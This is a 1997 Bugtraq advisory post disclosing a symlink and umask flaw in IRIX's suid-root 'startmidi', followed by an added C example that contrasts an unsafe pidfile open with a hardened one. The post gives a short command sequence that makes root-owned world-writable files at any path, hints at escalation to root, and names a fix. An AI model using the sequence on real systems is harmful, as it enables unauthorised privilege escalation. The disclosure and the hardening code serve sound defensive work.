[4021] in bugtraq
IRIX: Bug in startmidi
daemon@ATHENA.MIT.EDU (David Hedley)
Sun Feb 9 14:20:37 1997
Date: Sun, 9 Feb 1997 18:11:45 +0000
Reply-To: David Hedley <hedley@CS.BRIS.AC.UK>
From: David Hedley <hedley@CS.BRIS.AC.UK>
To: BUGTRAQ@NETSPACE.ORG
Whilst browsing around the filesystem on my SGI (running IRIX 5.3), I
noticed a little suid-root program called 'startmidi' which hides in
/usr/sbin. When run, this program creates various files in /tmp. You
guessed it, it respects umask and follows symlinks. Comme ca:

    % umask 0
    % ln -s /blardyblar /tmp/.midipid
    % startmidi -d /dev/ttyd1
    % ls -l /blardyblar
    -rw-rw-rw- 1 root pgrad 0 Feb 9 17:46 /blardyblar
    % stopmidi -d /dev/ttyd1
    %

Any existing files are truncated to zero length. New files are created
root-owned, mode 0666. I leave it to your furtive imaginations to get
root from this. 'stopmidi' removes the files created by 'startmidi' so
you may have to run that first if /tmp/.midipid already exists.
chmod -s /usr/sbin/startmidi fixes this problem.
My apologies if this has been documented before but I couldn't find it
anywhere on file and I don't remember it being posted to this list.
Regards,
David
--
David Hedley (hedley@cs.bris.ac.uk)
finger hedley@cs.bris.ac.uk for PGP key
Computer Graphics Group | University of Bristol | UK
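
Added example, not part of the original post and not startmidi's code: the file-creation behaviour the post describes (symlink followed, existing file truncated, mode left to umask) next to a hardened pidfile open for a current POSIX system. The function names, the temp-directory layout and the assumption that the flaw comes from an open() with O_CREAT|O_TRUNC and mode 0666 are all illustrative.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed flawed pattern: follows symlinks, truncates, mode left to umask. */
static int open_pidfile_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened: creates a new file or fails, never follows a final symlink, and
 * sets the mode on the descriptor so it does not depend on the caller's umask. */
static int open_pidfile_safe(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;  /* EEXIST: planted symlink or stale file */
    if (fchmod(fd, 0644) != 0) { close(fd); return -1; }
    return fd;
}

/* Constructed scenario in a private temp dir: "victim" holds 5 bytes and
 * "pidfile" is a symlink to it. Returns victim's size after the open attempt. */
static long victim_size_after(int use_safe)
{
    char dir[] = "/tmp/pidfile-demo-XXXXXX", victim[64], lnk[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/pidfile", dir);
    int v = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (v < 0 || write(v, "data\n", 5) != 5) return -1;
    close(v);
    if (symlink(victim, lnk) != 0) return -1;
    int fd = use_safe ? open_pidfile_safe(lnk) : open_pidfile_unsafe(lnk);
    if (fd >= 0) close(fd);
    long size = (stat(victim, &st) == 0) ? (long)st.st_size : -1;
    unlink(lnk); unlink(victim); rmdir(dir);
    return size;
}

int main(void)
{
    printf("victim size: unsafe=%ld safe=%ld\n",
           victim_size_after(0), victim_size_after(1));
    return 0;
}
```

With the hardened open, a stale pidfile also causes a failure, so the caller has to treat EEXIST as an error to report rather than something to overwrite.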